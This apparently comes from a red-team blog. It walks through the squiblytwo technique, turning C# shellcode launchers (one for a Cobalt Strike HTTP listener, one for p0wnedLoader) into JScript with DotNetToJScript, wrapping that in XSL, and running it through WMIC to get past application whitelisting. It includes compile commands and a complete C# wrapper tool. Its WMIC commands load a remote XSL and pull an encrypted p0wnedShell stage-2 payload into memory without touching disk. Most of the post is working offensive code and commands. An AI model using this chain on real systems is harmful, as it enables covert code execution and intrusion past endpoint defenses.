CSharp, DotNetToJScript, XSL
The technique, Casey Smith's squiblytwo (running JScript embedded in an XSL stylesheet via WMIC), has some notable attractions:
- Application whitelisting (AWL) bypass
- Execute when Windows Script Host is blocked
- Utilise JScript (and therefore DotNetToJScript)
- Load XSL locally or from a URL
- WMIC is proxy aware (and works over TLS)
I encourage you to read through Casey’s original post before proceeding here.
The goal of this post is to walk through how you can take your own C#, run it through DotNetToJScript, and throw the output into XSL format.
For this example we're going to execute 32-bit shellcode for a Cobalt Strike HTTP listener, using Arno0x0x's shellcodeLauncher as a template. The only thing we need to add is a public parameterless constructor for the Program class, because that is what the JScript generated by DotNetToJScript invokes when it instantiates the class.
Replace line 25 with your shellcode of choice.
Compile to DLL
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe -unsafe -platform:x86 -target:library shellcode.cs
It's good practice to test the payload at every step of the way, so before compiling to a DLL, compile it to an EXE and run it to make sure the shellcode executes as expected.
Next, provide the DLL to DotNetToJScript. Remember to modify the entry class if you’re using a different namespace and class name.
DotNetToJScript.exe -c ShellCodeLauncher.Program -o C:\Tools\shellcode.js C:\Tools\shellcode.dll
You can test the .js file using cscript, but because we're outputting 32-bit code we need to use the 32-bit cscript in SysWOW64.
The final step is to wrap the .js in the tags required by XSL. We can use the squiblytwo PoC as a template.
The final result should look something like this.
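As an added example (not code from the original post and not the squiblytwo PoC itself), the small C# tool below performs that wrapping step: it takes the DotNetToJScript output and emits the XSL skeleton that WMIC's /format: switch will load and execute. The XslWrapper name and the usage are assumptions for this example; the stylesheet layout is the one the squiblytwo PoC uses, with the JScript placed in an ms:script element inside a CDATA section.

```csharp
using System;
using System.IO;
using System.Text;

// Added helper, not part of the original post or of the squiblytwo PoC: wraps DotNetToJScript
// output in the XSL skeleton that WMIC /format: will execute, so the last step is repeatable.
namespace XslWrapper
{
    public static class Program
    {
        // Produces the stylesheet WMIC expects: the JScript lives in an ms:script block under the
        // urn:schemas-microsoft-com:xslt namespace, inside CDATA so the script's angle brackets
        // and ampersands are not parsed as XML.
        public static string Wrap(string jscript)
        {
            // A literal "]]>" inside the script would terminate the CDATA section early; split it
            // across two CDATA sections so the output stays well-formed.
            string safe = jscript.Replace("]]>", "]]]]><![CDATA[>");

            var sb = new StringBuilder();
            sb.AppendLine("<?xml version='1.0'?>");
            sb.AppendLine("<stylesheet xmlns=\"http://www.w3.org/1999/XSL/Transform\"");
            sb.AppendLine("    xmlns:ms=\"urn:schemas-microsoft-com:xslt\"");
            sb.AppendLine("    xmlns:user=\"placeholder\"");
            sb.AppendLine("    version=\"1.0\">");
            sb.AppendLine("<output method=\"text\"/>");
            sb.AppendLine("<ms:script implements-prefix=\"user\" language=\"JScript\">");
            sb.AppendLine("<![CDATA[");
            sb.AppendLine(safe);
            sb.AppendLine("]]>");
            sb.AppendLine("</ms:script>");
            sb.AppendLine("</stylesheet>");
            return sb.ToString();
        }

        // Usage (assumed name): XslWrapper.exe C:\Tools\shellcode.js C:\Tools\shellcode.xsl
        public static void Main(string[] args)
        {
            if (args.Length != 2)
            {
                Console.Error.WriteLine("usage: XslWrapper.exe <input.js> <output.xsl>");
                Environment.Exit(1);
            }

            string js = File.ReadAllText(args[0]);
            File.WriteAllText(args[1], Wrap(js));
        }
    }
}
```

The language attribute must be JScript (not JavaScript) for MSXML to pick the right script engine, and the output method is set to text only to keep the transform valid; the script runs when the stylesheet is loaded, before any output is produced.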
Again, because it's 32-bit, we need the SysWOW64 wmic to execute it.
C:\Windows\SysWOW64\wbem\WMIC.exe os get /format:"C:\Tools\shellcode.xsl"
p0wnedShell is a well-known PowerShell runspace post-exploitation toolkit written in C# that can run PowerShell commands and functions within a runspace without using powershell.exe. p0wnedLoader is probably less well known and is not maintained alongside the main p0wnedShell repo. It enables you to download an AES-encrypted version of p0wnedShell, decrypt it, then run it from memory.
For the purposes of this post, we’ll just use the old p0wnedShell in the p0wnedLoader repo - of course, you can compile and encrypt your own version with
As before, modify p0wnedLoader to provide a constructor for DotNetToJScript, then repeat the same steps from Example 1: compile p0wnedLoader.cs to a DLL, run DotNetToJScript and put the output in XSL format.
If we also host the XSL online, we can run the entire thing without touching disk.
C:\Windows\System32\wbem\WMIC.exe os get /format:"https://raw.githubusercontent.com/rasta-mouse/p0wnedLoader/master/p0wnedLoader.xsl"
Loads an Online AES Encrypted version of p0wnedShell
By Cn33liz 2016
[*] Please enter the p0wnedShell Stage2 URL > https://raw.githubusercontent.com/Cn33liz/p0wnedLoader/master/p0wnedShellx64.enc
[*] One moment while getting our Stage2 payload.... -> Done
[*] Now please enter our Decryption Password > **********